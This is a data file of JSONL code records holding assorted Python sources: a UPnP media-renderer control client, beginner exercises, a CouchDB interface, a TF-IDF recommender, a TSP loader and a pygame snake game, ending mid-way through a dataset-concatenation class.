+{"seq_id":"72987839","text":"#!/usr/bin/env python3\n\nimport html\nimport requests\nimport sys\n\nfrom xml.dom import minidom\nfrom xmlHelper import XmlHelper\n\nclass UpnpCommand:\n\n def __init__(self, host):\n self.host = host\n self.verbose = False\n\n def host_send(self, action, control_path, control_name, action_args):\n\n if self.host.startswith(\"http://\"):\n control_url = self.host + control_path\n host_name = self.host[7:]\n else:\n control_url = \"http://\" + self.host + control_path\n host_name = self.host\n\n body = ''\n body += ''\n body += ''\n body += '\t'\n body += action_args\n body += '\t'\n body += ''\n body += ''\n if self.verbose:\n print(body)\n headers = {'Host': host_name,\n 'User-Agent': 'xrf/1.0',\n 'Content-Type': 'text/xml; charset=\"utf-8\"',\n 'Content-Length': str(len(body)),\n 'SOAPAction': '\"urn:schemas-upnp-org:service:'+control_name+':1#'+action+'\"'}\n try:\n response = requests.post(control_url, data=body, headers=headers, verify=False)\n if response.status_code < 300:\n if self.verbose:\n print(response.content)\n result = minidom.parseString(response.content)\n if self.verbose:\n print(result.toprettyxml())\n return result\n else:\n print(\"query {0} returned status_code:{1}\".format(control_url,response.status_code))\n except Exception as e:\n print(\"host send error {0}\".format(e))\n return None\n\n def host_send_rendering(self, action, action_args):\n return self.host_send(action,\n \"/RenderingService/Control\",\n \"RenderingControl\",\n action_args)\n\n def host_send_transport(self, action, action_args):\n return self.host_send(action,\n \"/TransportService/Control\",\n \"AVTransport\",\n action_args)\n\n def host_send_contentdirectory(self, action, action_args):\n return self.host_send(action,\n \"/cd/Control\",\n \"ContentDirectory\",\n action_args)\n\n def play(self):\n xmlroot = self.host_send_transport(\"Play\", '01')\n return None\n\n def stop(self):\n xmlroot = self.host_send_transport(\"Stop\", '0')\n return None\n\n def seek(self, value):\n xmlroot = self.host_send_transport(\"Seek\",\n '0ABS_TIME'\n '' + value + '')\n return None\n\n def previous(self):\n xmlroot = self.host_send_transport(\"Previous\", '0')\n return None\n\n def next(self):\n xmlroot = self.host_send_transport(\"Next\", '0')\n return None\n\n def get_state_var(self):\n xmlroot = self.host_send_rendering(\"GetStateVariables\",\n '0<'\n 'StateVariableList>TransportStatus')\n return None\n\n def get_position_info(self):\n xmlroot = self.host_send_transport(\"GetPositionInfo\", '0')\n return XmlHelper.xml_extract_dict(xmlroot, ['Track',\n 'TrackDuration',\n 'TrackMetaData',\n 'TrackURI',\n 'RelTime',\n 'AbsTime',\n 'RelCount',\n 'AbsCount'])\n\n def get_transport_setting(self):\n xmlroot = self.host_send_transport(\"GetTransportSettings\", '0')\n return XmlHelper.xml_extract_dict(xmlroot, ['PlayMode'])\n\n def get_media_info(self):\n xmlroot = self.host_send_transport(\"GetMediaInfo\", '0')\n return XmlHelper.xml_extract_dict(xmlroot, ['PlayMedium', 'NrTracks', 'CurrentURI', 'CurrentURIMetaData'])\n\n def set_transport_uri(self, data):\n print(\"CurrentURI:\\n\" + data['CurrentURI'])\n print(\"CurrentURIMetaData:\\n\" + data['CurrentURIMetaData'])\n send_data = '0'\n add_uri = data['CurrentURI']\n if 'raumfeldname' in data:\n if data['raumfeldname'] == 'Station':\n if 'TrackURI' in data:\n add_uri = data['TrackURI']\n\n send_data += \"\"\n send_data += \"\" + html.escape(data['CurrentURIMetaData']) + \"\"\n # + html.escape(data['CurrentURIMetaData']) +\n print(data['CurrentURIMetaData'])\n xmlroot = self.host_send_transport(\"SetAVTransportURI\", send_data)\n return XmlHelper.xml_extract_dict(xmlroot, ['SetAVTransportURI'])\n\n '''Rendering service'''\n\n def get_volume(self):\n xmlroot = self.host_send_rendering(\"GetVolume\", '0Master')\n return XmlHelper.xml_extract_dict(xmlroot, ['CurrentVolume'])\n\n def set_volume(self, value):\n xmlroot = self.host_send_rendering(\"SetVolume\",\n '0Master' +\n '' + str(value) + '')\n return None\n\n\n def get_room_volume(self, uuid):\n xmlroot = self.host_send_rendering(\"GetRoomVolume\", '0'\n '' + uuid + '')\n return XmlHelper.xml_extract_dict(xmlroot, ['CurrentVolume'])\n\n\n def set_room_volume(self, uuid, value):\n xmlroot = self.host_send_rendering(\"SetVolume\",\n '0Master' +\n '' + str(value) + '' +\n '' + uuid + '')\n return None\n\n def get_browse_capabilites(self):\n xmlroot = self.host_send_contentdirectory(\"GetSearchCapabilities\", '')\n return XmlHelper.xml_extract_dict(xmlroot, ['SearchCaps'])\n\n def browse(self, path):\n browseData = \"\" + path +\"\" \\\n + \"BrowseMetadata\" \\\n + \"*\" \\\n + \"0\" \\\n + \"0\" \\\n + \"dc:title\"\n xmlroot = self.host_send_contentdirectory(\"Browse\", browseData)\n return XmlHelper.xml_extract_dict(xmlroot, ['Result', 'TotalMatches', 'NumberReturned'])\n\n def browsechildren(self, path):\n browseData = \"\" + path +\"\" \\\n + \"BrowseDirectChildren\" \\\n + \"*\" \\\n + \"0\" \\\n + \"0\" \\\n + \"dc:title\"\n xmlroot = self.host_send_contentdirectory(\"Browse\", browseData)\n return XmlHelper.xml_extract_dict(xmlroot, ['Result', 'TotalMatches', 'NumberReturned'])\n\n def browse_recursive_children(self, path, level=10):\n if level < 0:\n return\n result = self.browsechildren(path)\n if len(result) == 0:\n return\n xml_root = minidom.parseString(result['Result'])\n container_list = xml_root.getElementsByTagName(\"container\")\n for container in container_list:\n npath = container.attributes[\"id\"].value\n element = container.getElementsByTagName('dc:title')\n if element[0].firstChild is not None:\n title = element[0].firstChild.nodeValue\n print(\"C\", npath, \"-\", title)\n self.browse_recursive_children(npath,level-1)\n item_list = xml_root.getElementsByTagName(\"item\")\n for item in item_list:\n item_id = item.attributes[\"id\"].value\n element = item.getElementsByTagName('dc:title')\n title = element[0].firstChild.nodeValue\n if element[0].firstChild is not None:\n print(\"+\", path, \"-\", item_id, \"-\", title)\n\n\ndef usage(argv):\n print(\"Usage: \" + argv[0] + \" ip:port [COMMAND|INFO] {args}\")\n print(\"COMMAND: \")\n print(\" play play last stuff\")\n print(\" stop stop current playing\")\n print(\" setv vol set volume args=0..100\")\n print(\" seek pos seek to position args=00:00:00 ... 99:59:59\")\n print(\"INFO: \")\n print(\" getv get volume info\")\n print(\" position GetPositionInfo \")\n print(\" media GetMediaInfo\")\n print(\" transport GetTransportSettings \")\n print(\" allinfo all infos in one call \")\n print(\"BROWSE: \")\n print(\" cap get browse capabilities\")\n print(\" browse path Browse for data\")\n print(\" browsechildren path Browse for data append /* for recursive\")\n\n\ndef main(argv):\n if len(sys.argv) < 3:\n usage(sys.argv)\n sys.exit(2)\n\n host = sys.argv[1]\n uc = UpnpCommand(host)\n operation = sys.argv[2]\n result = None\n if operation == 'play':\n result = uc.play()\n elif operation == 'stop':\n result = uc.stop()\n elif operation == 'getv':\n result = uc.get_volume()\n elif operation == 'setv':\n result = uc.set_volume(sys.argv[3])\n elif operation == 'seek':\n result = uc.seek(sys.argv[3])\n elif operation == 'prev':\n result = uc.previous()\n elif operation == 'next':\n result = uc.next()\n elif operation == 'position':\n result = uc.get_position_info()\n elif operation == 'transport':\n result = uc.get_transport_setting()\n elif operation == 'getstatevar':\n result = uc.get_state_var()\n elif operation == 'media':\n result = uc.get_media_info()\n result += uc.get_position_info()\n elif operation == 'allinfo':\n result = uc.get_volume()\n result += uc.get_position_info()\n result += uc.get_transport_setting()\n result += uc.get_media_info()\n elif operation == 'cap':\n result = uc.get_browse_capabilites()\n elif operation == 'browse':\n result = uc.browse(argv[3])\n xmlRoot = minidom.parseString(result['Result'])\n print(xmlRoot.toprettyxml(indent=\"\\t\"))\n elif operation == 'browsechildren':\n if argv[3].endswith('/*'):\n result = uc.browse_recursive_children(argv[3][:-2])\n print(result)\n else:\n result = uc.browsechildren(argv[3])\n xmlRoot = minidom.parseString(result['Result'])\n print(xmlRoot.toprettyxml(indent=\"\\t\"))\n return\n\n else:\n usage(sys.argv)\n print(result)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n\n\n\n''' Transport\n\n\ndlna-playcontainer://uuid%3A3b06960d-f950-476c-8118-ad55893741d6\n?sid=urn%3Aupnp-org%3AserviceId%3AContentDirectory\n&cid=0%2FMy%20Music%2FAlbums%2FJeff%2520Beck%2BYou%2520Had%2520It%2520Coming\n&md=0\n{\ndlna-playcontainer://uuid:3b06960d-f950-476c-8118-ad55893741d6\n?sid=urn%3Aupnp-org%3AserviceId%3AContentDirectory\n&cid=0/My%20Music/Albums/Jeff%2520Beck%2BYou%2520Had%2520It%2520Coming\n&md=0\n&fii=0\",\ndlna-playcontainer://uuid:3b06960d-f950-476c-8118-ad55893741d6\n\n?sid=urn%3Aupnp-org%3AserviceId%3AContentDirectory\n&cid=0/My%20Music/Albums/Jeff%2520Beck%2BYou%2520Had%2520It%2520Coming\n&md=0&fii=0\n\n\n'dlna-playcontainer://\nuuid%3A3\nb06960d-f950-476c-8118-ad55893741d6\n?sid=urn%3Aupnp-org%3AserviceId%3AContentDirectory\n&cid=0%2FMy%20Music%2FArtists%2FAl%2520Di%2520Meola%2FAl%2520Di%2520Meola%2BElegant%2520Gypsy\n&md=0\n&fii=0'\n\n\n\"http://opml.radiotime.com/Tune.ashx?id=s56065&formats=wma,mp3,ogg&partnerId=7aJ9pvV5&serial=54:4a:16:7f:16:82\",\n\nLineIn: Uri\n\"http://192.168.2.110:8888/stream.flac\",\n\n\n;http://192.168.2.110:42970\n/874a359d-1c7c-4816-bc44-e0bb170709c7\n/f8dc41ab-6b7c-4d07-8095-30d6bdcabb9a\n/93b5a7d0-17c4-48f0-b317-ac8b5d50b7d1\n/4c84a0a1c1d403d9f2273056d22b9527--2112583696-0-0.flac</res></item></DIDL-Lite> \"/>\n\t\t\n\t\t\n\n\"Pause\": {\n \"InstanceID\": {\n\"SetAVTransportURI\": {\n \"CurrentURI\": {\n \"relatedStateVariable\": \"AVTransportURI\"\n \"CurrentURIMetaData\": {\n \"relatedStateVariable\": \"AVTransportURIMetaData\"\n \"InstanceID\": {\n\"SetNextAVTransportURI\": {\n \"InstanceID\": {\n \"NextURI\": {\n \"relatedStateVariable\": \"AVTransportURI\"\n \"NextURIMetaData\": {\n \"relatedStateVariable\": \"AVTransportURIMetaData\"\n\"SetNextStartTriggerTime\": {\n \"InstanceID\": {\n \"StartTime\": {\n \"TimeService\": {\n\"SetPlayMode\": {\n \"InstanceID\": {\n \"NewPlayMode\": {\n'''\n\n'''\n\"GetMute\": {\n \"Channel\": {\n \"InstanceID\": {\n\"GetRoomMute\": {\n \"InstanceID\": {\n \"Room\": \"relatedStateVariable\": \"UUID\"\n\"GetRoomVolume\": {\n \"InstanceID\": {\n \"relatedStateVariable\": \"A_ARG_TYPE_InstanceID\"\n \"Room\": \"relatedStateVariable\": \"UUID\"\n\"SetMute\": {\n \"Channel\": {\n \"DesiredMute\": {\n \"InstanceID\": {\n\"SetRoomMute\": {\n \"DesiredMute\": {\n \"InstanceID\": {\n \"Room\":\"relatedStateVariable\": \"UUID\"\n\"SetRoomVolume\": {\n \"DesiredVolume\": {\n \"InstanceID\": {\n \"Room\": \"relatedStateVariable\": \"UUID\"\n'''\n","sub_path":"upnpCommand.py","file_name":"upnpCommand.py","file_ext":"py","file_size_in_byte":14553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"179605571","text":"# Let's play with functions a little bit more\n\n# 1. The syntax of definining a function\ndef sample_function():\n\tprint(\"this is the most basic syntax of function\")\n\nsample_function()\n\n# 2. Taking arguments and un-determined arguments:\ndef multi_arg_function(arg1, arg2, *arg3):\n\tprint(\"First argument\",arg1)\n\tprint(\"Second argument\",arg2)\n\tprint(\"Last argument\",arg3)\nmulti_arg_function(1,2,3,4,5,6,7)\n\n# 3. Function with pre-defined value ()\ndef pre_defined_sum(a = 1, b = 1):\n\treturn (a+b)\nprint(\"when passing no value:\",pre_defined_sum())\nprint(\"when adding 2 and 2:\",pre_defined_sum(2,2))\n\n# 4. To pass a dictionary, use **. ** is for dictionary\ndef dict_function(**dict_arg):\n\tfor key, value in dict_arg.items():\n\t\tprint(key,\"-\",value)\nname1 = \"str_as_key\"\ndict_ = {\n\t'a':1,\n\t'b':2,\n\t'c':3\n}\ndict_function(a = 1,b = 2,c = 3)\n# dict_function(dict_)","sub_path":"Python/04_Function.py","file_name":"04_Function.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"198246031","text":"def load_state_dict(self, state_dict):\n \"Copies parameters and buffers from :attr:`state_dict` into\\n this module and its descendants. The keys of :attr:`state_dict` must\\n exactly match the keys returned by this module's :func:`state_dict()`\\n function.\\n\\n Arguments:\\n state_dict (dict): A dict containing parameters and\\n persistent buffers.\\n \"\n own_state = self.state_dict()\n for (name, param) in state_dict.items():\n if (name not in own_state):\n raise KeyError('unexpected key \"{}\" in state_dict'.format(name))\n if isinstance(param, Parameter):\n param = param.data\n own_state[name].copy_(param)\n missing = (set(own_state.keys()) - set(state_dict.keys()))\n if (len(missing) > 0):\n raise KeyError('missing keys in state_dict: \"{}\"'.format(missing))","sub_path":"Data Set/bug-fixing-5/95ccbf8b0b29bc0d285367c7de693fb24628bd26--bug.py","file_name":"95ccbf8b0b29bc0d285367c7de693fb24628bd26--bug.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"44498084","text":"import json\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\n\ndef clean_data_actual():\n\n\tprojects = []\n\tstatus_value = {'Rejected':-1,'Starred':0,'Approved':1}\n\n\twith open('nlp/Untitled.json') as f:\n\t\tfor line in f:\n\t\t\trow = []\n\t\t\tdata = json.loads(line)\n\n\t\t\trow.append(data['idea_id']['$numberInt'])\n\t\t\trow.append(data['title'])\n\t\t\trow.append(data['abstract'])\n\t\t\trow.append(status_value[data['status']])\n\t\t\trow.append(data['like_count']['$numberInt'])\n\t\t\trow.append(data['dislike_count']['$numberInt'])\n\n\t\t\t#print(str(idea_id)+\" \"+data['title']+\" \"+str(status_value[data['status']])+\" \"+str(like_count)+\" \"+str(like_count))\n\t\t\tprojects.append(row)\n\n\tdf = pd.DataFrame(projects,columns=['idea_id','title','abstract','status','like_count','dislike_count'])\n\treturn df\n\ndef get_recommendations(df,title,indices,cosine_sim,n_rec=3):\n\tidx = indices[title]\n\tsim_scores = list(enumerate(cosine_sim[idx]))\n\tsim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\tsim_scores = sim_scores[1:(n_rec+1)]\n\n\tmovie_indices = [i[0] for i in sim_scores]\n\treturn df['title'].iloc[movie_indices]\n\ndef get_param():\n\n\tdf = clean_data_actual()\n\t#print(df['abstract'].head())\n\ttfidf = TfidfVectorizer(stop_words='english')\n\ttfidf_matrix = tfidf.fit_transform(df['abstract'])\n\t#print(tfidf_matrix.shape)\n\tcosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n\tindices = pd.Series(df.index, index=df['title']).drop_duplicates()\n\n\treturn df,cosine_sim,indices\n\ndf,cosine_sim,indices = get_param()\ndf = get_recommendations(df,\"Food Recommender\",indices,cosine_sim)\n\nprint(df.values.tolist())","sub_path":"nlp/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"217690771","text":"# -*-coding: utf-8 -*-\nimport math\nimport cmath\n\n\n# 10-6\ndef myopen(fn, mode='r', encoding='utf-8'):\n try:\n f = open(fn, mode, encoding=encoding)\n return f\n except BaseException as e:\n return None\n\n\n# 10-8\ndef safe_input(output):\n try:\n s = input(output)\n return s\n except (EOFError, KeyboardInterrupt) as e:\n print(e)\n return None\n\n\n# 10-9\ndef safe_sqrt(num):\n try:\n return math.sqrt(num)\n except ValueError as ve:\n return cmath.sqrt(num)\n\n\ndef test():\n # 10-6 test\n print(myopen('nofile'))\n print(myopen('../ch9/doc.txt'))\n # 10-8 test\n # print(safe_input('请输入:\\n'))\n # 10-9 test\n print(safe_sqrt(-1))\n\nif __name__ == '__main__':\n test()\n\n","sub_path":"ch10/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"208105683","text":"class Fraccion:\r\n \r\n\r\n def __init__(self, num, den):\r\n self.num = num\r\n self.den = den\r\n \r\n \r\n def imprime(self):\r\n print(self.num, \"/\", self.den)\r\n\r\n def multiplicar(self, b):\r\n n = self.num * b.num\r\n d = self.den * b.den\r\n r = Fraccion(n,d)\r\n return r\r\n \r\n \r\n \r\n \r\ndef main():\r\n\r\n a = Fraccion(3,2)\r\n a.imprime()\r\n\r\n b = Fraccion(7,4)\r\n b.imprime()\r\n\r\n r = a.multiplicar(b)\r\n r.imprime()\r\n \r\n\r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\n","sub_path":"Clases_y_objetos.py","file_name":"Clases_y_objetos.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"6682553","text":"from json import dumps, loads\n\nimport urllib\n\n\nclass CouchDBInterface():\n \"\"\"\n CoucDB interface class. Provides simple methods to interact with database,\n \"\"\"\n def __init__(self, dbname, url='http://localhost:5984/', lucene_url='http://localhost:5985/', queue_size=1000):\n self.__dbname = dbname\n self.__dburl = url\n self.__lucene_url = lucene_url\n self.__queuesize = queue_size\n self.__opener = urllib.request.build_opener(urllib.request.HTTPHandler)\n self.reset_queue()\n\n def reset_queue(self):\n \"\"\"\n Clear batch actions queue.\n \"\"\"\n self.__queue = []\n\n def construct_request(self, url, db_url=None, method='GET', headers=None, data=None):\n \"\"\"\n Method to construct a HTTP request to database\n \"\"\"\n if headers is None:\n headers = {}\n\n headers['Content-Type'] = 'application/json'\n if db_url is None:\n db_url = self.__dburl\n\n if data is None:\n request = urllib.request.Request(db_url + url,\n headers=headers,\n method=method)\n else:\n request = urllib.request.Request(db_url + url,\n headers=headers,\n data=dumps(data).encode('utf-8'),\n method=method)\n\n # print('Construct request: %s' % (db_url + url))\n return request\n\n def to_json_query(self, params):\n \"\"\"\n Converts object to properly encoded JSON in utf-8\n \"\"\"\n stringfied = dict()\n for p in params:\n if isinstance(params[p], str):\n stringfied[p] = params[p]\n else:\n stringfied[p] = dumps(params[p])\n\n return urllib.parse.urlencode(stringfied)\n\n def get_document(self, doc_id, rev=None):\n \"\"\"\n Get a single document from database\n \"\"\"\n if rev is None:\n db_request = self.construct_request('%s/%s' % (self.__dbname,\n doc_id))\n else:\n db_request = self.construct_request('%s/%s?rev=%s' % (self.__dbname,\n doc_id,\n rev))\n\n data = self.__open(db_request)\n return data\n\n def load_view(self, view_name, options=None):\n \"\"\"\n Query couchDB view with optional query parameters\n \"\"\"\n if options is None:\n db_request = self.construct_request(\"%s/%s\" % (self.__dbname,\n view_name))\n else:\n db_request = self.construct_request(\"%s/%s?%s\" % (self.__dbname,\n view_name,\n self.to_json_query(options)))\n\n data = self.__open(db_request)\n return data\n\n def commit_one(self, doc):\n \"\"\"\n Put single document to couchDB, _id can be specified in to-be written document object\n \"\"\"\n db_request = self.construct_request(self.__dbname, method='POST', data=doc)\n data = self.__open(db_request)\n return data\n\n def delete_doc(self, doc_id, rev=None):\n \"\"\"\n Mark document as deleted and commit to couchDB\n \"\"\"\n tmp_doc = self.document(doc_id, rev)\n tmp_doc[\"_deleted\"] = True\n data = self.commit_one(tmp_doc)\n return data\n\n def enqueue(self, doc):\n \"\"\"\n Add a document to queue list. If queue is full - commit\n \"\"\"\n self.__queue.append(doc)\n if len(self.__queue) >= self.__queuesize:\n self.commit()\n\n def commit(self, doc=None):\n \"\"\"\n Commit queue to DB. if wanted to commit single doc -> it is added to queue\n \"\"\"\n if doc is not None:\n self.enqueue(doc)\n\n if len(self.__queue) == 0:\n return\n\n to_send = dict()\n to_send['docs'] = self.__queue\n db_request = self.construct_request('%s/_bulk_docs/' % (self.__dbname),\n method='POST',\n data=doc)\n retval = self.__open(db_request)\n self.reset_queue()\n return retval\n\n def document_exists(self, doc_id, rev=None):\n \"\"\"\n Check if a document exists by ID. If specified check that the revision rev exists\n \"\"\"\n url = '/%s/%s' % (self.__dbname, doc_id)\n if rev:\n url += '?rev=%s' % (rev)\n\n try:\n db_request = self.construct_request(url, method='HEAD')\n self.__open(db_request)\n return True\n except Exception:\n return False\n\n def fti_search(self, query, options=None):\n \"\"\"\n Query couchDB view with optional query parameters using couchdb-lucene (fti)\n \"\"\"\n if 'key' in options:\n options['key'] = '\"' + str(options['key']) + '\"'\n\n # localhost:5985/local/campaigns/_design/lucene/search?q=prepid:First*&include_docs=true\n db_request = self.construct_request('local/%s/_design/lucene/search?q=%s&%s' % (self.__dbname,\n query,\n self.to_json_query(options)),\n db_url=self.__lucene_url)\n data = self.__open(db_request)\n return data\n\n def get_update_sequence(self, options=None):\n \"\"\"\n Get database update sequence information\n \"\"\"\n if options is None:\n options = {}\n\n options[\"_info\"] = True\n db_request = self.construct_request('%s?%s' % (self.__dbname,\n self.to_json_query(options)))\n data = self.__open(db_request)\n return data[\"update_seq\"]\n\n def count(self):\n \"\"\"\n Return number of documents in database\n \"\"\"\n db_request = self.construct_request(self.__dbname)\n data = self.__open(db_request)\n return data[\"doc_count\"]\n\n def __open(self, request):\n data = self.__opener.open(request)\n result = data.read().decode('utf-8')\n if not result:\n return {}\n\n result = loads(result)\n return result\n","sub_path":"couchdb_layer/couchdb_interface.py","file_name":"couchdb_interface.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"482387214","text":"import tsplib95 as tsp\nimport numpy as np\nfrom scipy.spatial import distance_matrix\n\npathA = \"kroA200.tsp\"\npathB = \"kroB200.tsp\"\n\n\nclass PrepareData:\n\n def __init__(self, path):\n self.data = tsp.load_problem(path)\n self.coordinates = self.get_coords()\n self.distance_matrix = self.calculate_distance_matrix()\n\n def get_coords(self):\n cords_dict = self.data.node_coords\n coordinates = []\n for k in cords_dict.keys():\n coordinates.append(cords_dict.get(k))\n return np.array(coordinates)\n\n def calculate_distance_matrix(self):\n matrix_of_distances = distance_matrix(self.coordinates, self.coordinates)\n matrix_of_distances = np.rint(matrix_of_distances)\n matrix_of_distances = matrix_of_distances.astype(int)\n return matrix_of_distances\n\n\ndef shortest_next(distances_matrix, visited, last):\n new_row_of_distance_matrix = distances_matrix[last].copy()\n max_value = np.max(new_row_of_distance_matrix)\n new_row_of_distance_matrix[last] = 2*max_value\n for v in visited:\n new_row_of_distance_matrix[v] = 2*max_value\n return np.argmin(new_row_of_distance_matrix)","sub_path":"preparedata.py","file_name":"preparedata.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"58478109","text":"# -*- coding: utf-8 -*-\n'''\n1、控制小蛇的运动\n2、检测是否发生碰撞\n3、游戏失败提示\n'''\n\nimport pygame # 导入pygame库\nfrom pygame.locals import * # 导入pygame库中的一些常量\nfrom sys import exit # 导入sys库中的exit函数\nfrom random import randint\n\nSCREEN_WIDTH, SCREEN_HEIGHT = 640, 480 # 定义窗口的分辨率\nclock = pygame.time.Clock() # 时钟,用于设置游戏帧率\n\n# 初始化\npygame.init() # 初始化pygame\nscreen = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT]) # 初始化窗口\npygame.display.set_caption('贪吃蛇') # 设置窗口标题\n\n# 图片资源\nstart_img = pygame.image.load('res/start.jpg') # 开始图\nback_img = pygame.image.load('res/back.jpg') # 背景图\nfail_img = pygame.image.load('res/fail.png') # 失败图\n\n\n##############################################################\n\n\n# 定义一些常量\nGRID_SIZE = 20 # 格子大小\nX_MAX = SCREEN_WIDTH / GRID_SIZE\nY_MAX = SCREEN_HEIGHT / GRID_SIZE\n# 四个运动方向\nDIRE_LEFT, DIRE_RIGHT, DIRE_UP, DIRE_DOWN = [-1, 0], [1, 0], [0, -1], [0, 1]\nKEY_DIRECTION = {pygame.K_LEFT: DIRE_LEFT, pygame.K_RIGHT: DIRE_RIGHT,\n pygame.K_UP: DIRE_UP, pygame.K_DOWN: DIRE_DOWN}\n\n\nclass SnakeBlock(pygame.sprite.Sprite):\n '蛇身 精灵'\n OUTER_RECT = pygame.Rect(0, 0, 20, 20)\n INNER_RECT = pygame.Rect(4, 4, 12, 12)\n OUTER_COLOR = (0, 0, 255)\n INNER_COLOR = (173, 216, 230)\n\n def __init__(self, x, y):\n super().__init__()\n # 绘制蛇身\n surface = pygame.Surface([GRID_SIZE, GRID_SIZE])\n pygame.draw.rect(surface, self.OUTER_COLOR, self.OUTER_RECT)\n pygame.draw.rect(surface, self.INNER_COLOR, self.INNER_RECT)\n # 初始化\n self.image = surface\n self.rect = self.image.get_rect()\n self.rect.topleft = [GRID_SIZE * x, GRID_SIZE * y]\n # 蛇身运动方向\n self.direction = DIRE_RIGHT\n\n def update(self):\n self.rect.left += GRID_SIZE * self.direction[0]\n self.rect.top += GRID_SIZE * self.direction[1]\n\n\nclass Snake(pygame.sprite.Group):\n '小蛇 组'\n\n def __init__(self):\n '初始化,创建三节蛇身'\n super().__init__()\n self.add(SnakeBlock(X_MAX/2, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 1, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 2, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 3, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 4, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 5, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 6, Y_MAX/2))\n\n def __del__(self):\n '析构函数'\n self.empty()\n\n def SetDirection(self, direction):\n ''''\n 设置方向。\n 小蛇的运动方向 就是蛇头的运动方向'\n 上下运动时才能向左/右,左右运动时才能向上/下\n '''\n st = self.sprites()[0]\n if direction in [DIRE_LEFT, DIRE_RIGHT] and st.direction in [DIRE_UP, DIRE_DOWN]:\n st.direction = direction\n elif direction in [DIRE_UP, DIRE_DOWN] and st.direction in [DIRE_LEFT, DIRE_RIGHT]:\n st.direction = direction\n\n def ChangeDirection(self):\n ''\n # 依次改变蛇身运动方向为上一段(第一段不变)\n pre_direction = DIRE_RIGHT # 记录上一段蛇身的运动方向\n for (i, s) in enumerate(self):\n t = s.direction\n if i > 0: # 改为上一段蛇身的运动方向\n s.direction = pre_direction\n pre_direction = t\n\n def Collide(self):\n '检测是否发生碰撞'\n return self.CollideBox() or self.CollideSelf()\n\n def CollideBox(self):\n '检测是否碰撞边沿'\n rect = self.sprites()[0].rect\n return rect.left < 0 or rect.right > SCREEN_WIDTH or rect.top < 0 or rect.bottom > SCREEN_HEIGHT\n\n def CollideSelf(self):\n '检测是否碰撞自身'\n return len(pygame.sprite.spritecollide(self.sprites()[0], self, False)) > 1\n\n\n##############################################################\n\n\n# 游戏状态:0 开始,1 游戏,2 失败\nstate_index = 0\nspeed = 5\nsnake = None\n\n# 事件循环(main loop)\nwhile True:\n clock.tick(speed) # 游戏帧率(也是小蛇的运行速度)\n\n # 处理游戏退出,从消息队列中循环取\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n if event.type == pygame.KEYDOWN:\n\n if event.key == pygame.K_SPACE:\n if state_index in [0, 2]:\n # 开始游戏,初始化小蛇\n state_index = 1\n speed = 5\n del snake # 清空原有小蛇\n snake = Snake()\n if state_index == 1 and event.key in KEY_DIRECTION:\n snake.SetDirection(KEY_DIRECTION[event.key])\n # if event.key == pygame.K_LEFT:\n # snake.SetDirection(DIRE_LEFT)\n # elif event.key == pygame.K_RIGHT:\n # snake.SetDirection(DIRE_RIGHT)\n # elif event.key == pygame.K_UP:\n # snake.SetDirection(DIRE_UP)\n # elif event.key == pygame.K_DOWN:\n # snake.SetDirection(DIRE_DOWN)\n\n if state_index == 0:\n screen.blit(start_img, (0, 0)) # 绘制背景\n elif state_index == 2:\n '游戏失败'\n # screen.blit(fail_img, (0, 0))\n else:\n # 正常游戏时\n screen.blit(back_img, (0, 0))\n snake.update()\n snake.draw(screen)\n snake.ChangeDirection()\n if snake.Collide():\n state_index = 2\n screen.blit(fail_img, (0, 0)) # 状态改变时运行一次即可\n\n # 更新屏幕\n pygame.display.update() # 更新屏幕\n","sub_path":"snake.3.py","file_name":"snake.3.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"615032984","text":"from typing import Sequence, Any, Union, Callable, List, Tuple, Iterator, Iterable\nimport warnings\nimport pickle\nimport copy\nfrom pathlib import Path\nfrom itertools import accumulate, chain, islice\nimport bisect\n\n\nclass RandomAccessConcat:\n def __init__(self, *datasets: List[Sequence[Any]]) -> None:\n self._datasets = datasets\n self._offsets = None\n self._length = None\n\n def _initialize_offsets(self) -> None:\n self._lengths = list(accumulate(len(d) for d in self._datasets))\n self._offsets = [0] + self._lengths[:-1]\n\n def __iter__(self) -> Iterator[Any]:\n for d in self._datasets:\n yield from d\n\n def __getitem__(self, index: int) -> Any:\n if self._offsets is None:\n self._initialize_offsets()\n if index < 0 or len(self) <= index:\n raise IndexError('RandomAccessConcat object index out of range')\n j = bisect.bisect_right(self._lengths, index)\n return self._datasets[j][index - self._offsets[j]]\n\n def __len__(self) -> int:\n if self._offsets is None:\n self._initialize_offsets()\n if self._length is None:\n self._length = self._lengths[-1]\n return self._length\n\n\nclass RandomAccessZip:\n def __init__(self, *datasets: 